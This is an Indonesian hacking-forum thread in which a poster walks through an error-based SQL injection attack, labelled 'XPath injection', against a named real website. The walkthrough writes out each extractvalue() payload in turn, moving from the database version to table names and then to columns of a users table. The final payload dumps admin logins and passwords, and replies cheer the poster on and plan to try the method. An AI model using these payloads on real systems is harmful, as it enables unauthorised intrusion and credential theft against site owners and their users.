Xpath Injection
#1
assalamualaikum
ijin berbagi + menggalau + nyepam + icik2 Big Grin

Oke tutorial kali ini saya dapatkan dari teman kita bernama X'inject yg bertema xpath injection
Bagi yg udah tau harap minggat yah Tongue
Ok apa itu xpath injection
Xpath injection ialah suatu teknik untuk menginjeksi database guna untuk mengambil data sensitif
di dalam dokumen XML yang ada dalam database di sebuah website=> kata om x’injext

led-lab.com/ang/detail_prod.php?ID=55&id_cat=4&id_cat1=22 <= TARGET
(maaf gak disensor karena udah 18++ Tongue )
kita main manual kk Big Grin jangan lupa hidupin kemenyan nya Big Grin

[Image: ydPs8Zz.png]
ada vurl kan tes lagi dah

[Image: BwVEt43.png]
wahh tidak keluar yg error, lanut lagi

[Image: fHd6kWI.png]
wew di atas error tuh
oke kita coba masukin http://led-lab.com/ang/detail_prod.php?I...id_cat1=22 union select 1,2,3,4-- ada angka ajaib gak ya

[Image: Rfiz6yr.png]

bahh surem kagak keluar angka ajaib nya, terpaksa kita memainkan nada2 cinta dulu Angry

LANJUT
masukan perintah ini
http://led-lab.com/ang/detail_prod.php?I...id_cat1=22 and extractvalue(rand(),concat(0x3a,version()))--

[Image: 31TNW9D.png]

bisa dilihatkan versi berapa Big Grin, ayo lanjut lagi

memunculkan nama-nama table yang ada dalam web tersebut dengan cara Menggati perintah version() dengan select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)

http://led-lab.com/ang/detail_prod.php?I...id_cat1=22 and extractvalue(rand(),concat(0x3a,(select concat(table_name) from information_schema.tables
where table_schema=database() limit 0,1)))--

[Image: WLz72vx.png]

nah itu limit 0,1)))— kita atur2 saja sampai berbau nama admin or apa lah, liat sini
[Image: PLhyGP0.png]

Langkah selanjutnya ialah memunculkan nama kolom-kolom yang ada dalam table tersebut dengan cara
mengganti perintah table_name dengan perintah column_name dan mengganti perintah .tables
setelah information_schema dengan .columns , serta mengganti perintah table_schema= menjadi
table_name= dan diikuti dengan hasil hash hexa atau mysql char dari nama table yang kita curigai
sebagai sarang admin

Sehingga perintahnya menjadi:

and extractvalue(rand(),concat(0x3a,(select concat(column_name) from information_schema.columns
where table_name=0x6c65645f7573657273 limit 0,1)))--
6c65645f7573657273 adalah hasil hexa dari led_users

[Image: YmRXu6g.png]
hasil nya XPATH syntax error: ':id' sama kaya tadi kita otak atik aja limit 0,1 sampau dapat yg kita cari
kalo udah di otak atik tar dapat id,login dan pswd (LIAT GAMBAR )


[Image: krEAUtz.png]

[Image: 7eb4PXi.png]

nah dari semua di atas bisa langsung kita liat id,login dan passwd nya dg perintah

http://led-lab.com/ang/detail_prod.php?I...id_cat1=22 and extractvalue(rand(),concat(0x3a,(select concat(id,0x3a,login,0x3a,pswd) from led_users)))--

[Image: WDRudLU.png]

oke sekian dari saya
TTD
wine trochanter Big Grin
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#2
mantap bang, thanks for share Big Grin
Information Is The Most Dangerous Weapon In The World

#3
Akhirnya di share juga dimari, Big Grin
mantap, ijin coba malem ini Big Grin
Quote:~ Tan Hana Wighna Tan Sirna ~

#4
cakep om, cek kulkas Big Grin
ajarin ane sqlmanual dunk , pusing ne banyak macamnya ya sql manual ? :/
aceh.indonesianbacktrack.or.id


#5
Aku baru tau model ginian
praktek ahhk cek kulkas om :*
alpoah@IBTeam:~#


Power Off BODOH

#6
ini kan yang ane request buat ASWB V3 =)) =))
sekarang udah berjatuhan tutornya sip om Big Grin

#7
BTW ini addons apa ya bro? dulu ane udah install addons ini... tapi di ubuntu Big Grin ane lupa "v

#8
(05-04-2013, 11:05 AM)abdilahrf Wrote: ini kan yang ane request buat ASWB V3 =)) =))
sekarang udah berjatuhan tutornya sip om Big Grin

wkwkkw ane kagak tau pak kalo itu request ente, yaudah gak pa2 masukin aja tar di aswb 3 Big Grin

(05-04-2013, 12:36 PM)Andy182 Wrote: BTW ini addons apa ya bro? dulu ane udah install addons ini... tapi di ubuntu Big Grin ane lupa "v

namanya hackbar om, cari aja Big Grin
silahkan dicoba >Big Grin<
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#9
wew mantap dah kakak dokter yg ini bsk ane ajarin ya kakak yg lebih Big Grin
/> Paling ganteng seIBTeam Regional Semarang :p

#rosenet-semarang.blogspot.com
#https://www.facebook.com/rosenetsemarang

#10
ohh ane lupa
Xpath injection hanyalah salah satu teknik dan bukan satu-satunya teknik untuk mengatasi kasus
ketika jumlah table tidak ditemukan saat memasukan perintah order by dan ketika kita memasukan
perintah union select tidak menemukan angka injeksi
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix






Users browsing this thread: 1 Guest(s)